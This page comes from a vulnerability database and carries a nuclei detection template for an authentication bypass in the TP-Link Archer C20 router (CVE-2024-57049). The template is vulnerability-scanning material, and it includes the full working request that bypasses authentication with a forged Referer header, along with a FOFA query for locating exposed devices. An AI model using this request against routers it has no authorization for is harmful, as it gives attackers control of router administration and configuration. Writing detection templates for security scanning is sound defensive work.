Lucene search
K

TP-Link Archer C20 - Authentication Bypass

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 133 Views

Vulnerability in TP-Link Archer C20 allows authentication bypass for unauthorized access.

Related
Refs
Code
id: CVE-2024-57049

info:
  name: TP-Link Archer C20 - Authentication Bypass
  author: ritikchaddha
  severity: critical
  description: |
    A vulnerability in the TP-Link Archer C20 router with firmware version V6.6_230412 and earlier permits unauthorized individuals to bypass authentication on interfaces under the /cgi directory. When adding a Referer header with value "http://tplinkwifi.net" to requests, the router will recognize the request as passing authentication, allowing access to protected administration interfaces.
  impact: |
    Unauthenticated attackers can bypass authentication by adding a specific Referer header, gaining unauthorized access to protected administration interfaces and router configuration.
  remediation: |
    Update TP-Link Archer C20 router to firmware version later than V6.6_230412 that addresses the authentication bypass vulnerability.
  reference:
    - https://github.com/Shuanunio/CVE_Requests/blob/main/TP-Link/archer%20c20/ACL%20bypass%20Vulnerability%20in%20TP-Link%20archer%20c20.md
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57049
    - https://github.com/advisories/GHSA-qr32-fcm4-m5h9
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-57049
    cwe-id: CWE-287
    epss-score: 0.03211
    epss-percentile: 0.86579
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="Archer C20"
  tags: cve,cve2024,tp-link,auth-bypass,archer-c20,vkev,vuln

http:
  - raw:
      - |
        POST /cgi/getGDPRParm HTTP/1.1
        Host: {{Hostname}}
        Referer: http://tplinkwifi.net

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "$.ret=0;"
          - "var "
        condition: and

      - type: word
        part: content_type
        words:
          - "application/javascript"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e5f555a941ed4c32ff83bd19611b8cc361b4586286622c1677d87d30366b24a202206e6cc7e1b6d84e1e1f3c6005d3d75657fde626aa3ce3ac88c01fb61bc3065a33:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.03211
133